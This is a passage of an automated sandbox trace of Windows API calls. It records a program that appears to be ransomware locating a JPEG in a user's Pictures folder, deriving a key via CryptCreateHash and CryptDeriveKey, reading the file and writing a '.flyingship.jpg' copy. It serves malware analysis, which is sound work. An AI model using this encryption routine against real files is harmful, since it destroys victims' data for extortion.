wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.296] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0191.296] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.296] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.297] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.297] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.297] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.297] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.297] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23400e00, ftCreationTime.dwHighDateTime=0x1d5e310, ftLastAccessTime.dwLowDateTime=0xe7155b40, ftLastAccessTime.dwHighDateTime=0x1d5e5dc, ftLastWriteTime.dwLowDateTime=0xe7155b40, ftLastWriteTime.dwHighDateTime=0x1d5e5dc, nFileSizeHigh=0x0, nFileSizeLow=0x103c4, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="oNhYsixG5vZ 1mhk2TaA.jpg", cAlternateFileName="ONHYSI~1.JPG")) returned 0x90ae18 [0191.297] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.297] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.297] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.297] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0191.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0191.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.298] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0191.299] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0191.299] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.299] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0191.299] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.299] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.299] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.299] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.299] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.299] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0191.300] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0191.300] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.300] CryptHashData (hHash=0x90af58, pbData=0x8df140, dwDataLen=0x19, dwFlags=0x1) returned 1 [0191.300] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.300] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.300] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0191.300] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.301] CryptDestroyHash (hHash=0x90af58) returned 1 [0191.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0191.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0191.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0191.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\onhysixg5vz 1mhk2taa.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.302] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.302] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0191.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0191.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0191.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0191.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0191.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0191.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.303] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0191.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0191.303] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0191.303] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0191.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0191.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0191.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0191.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0191.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0191.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0191.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0191.305] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0191.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0191.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0191.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.flyingship.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\onhysixg5vz 1mhk2taa.flyingship.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0191.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0191.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0191.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0191.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0191.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0191.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0191.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0191.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0191.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0191.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0191.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0191.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0191.309] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0191.309] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0191.313] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x3c4, lpOverlapped=0x0) returned 1 [0191.313] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0191.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0191.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0191.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0191.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x103c4) returned 0xbea018 [0191.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0191.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0191.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0191.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x103c4) returned 0xbfa3e8 [0191.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0191.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0191.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0191.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0191.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x103c4) returned 0xbea018 [0191.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0191.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0191.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0191.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0191.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0191.317] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.317] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0191.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 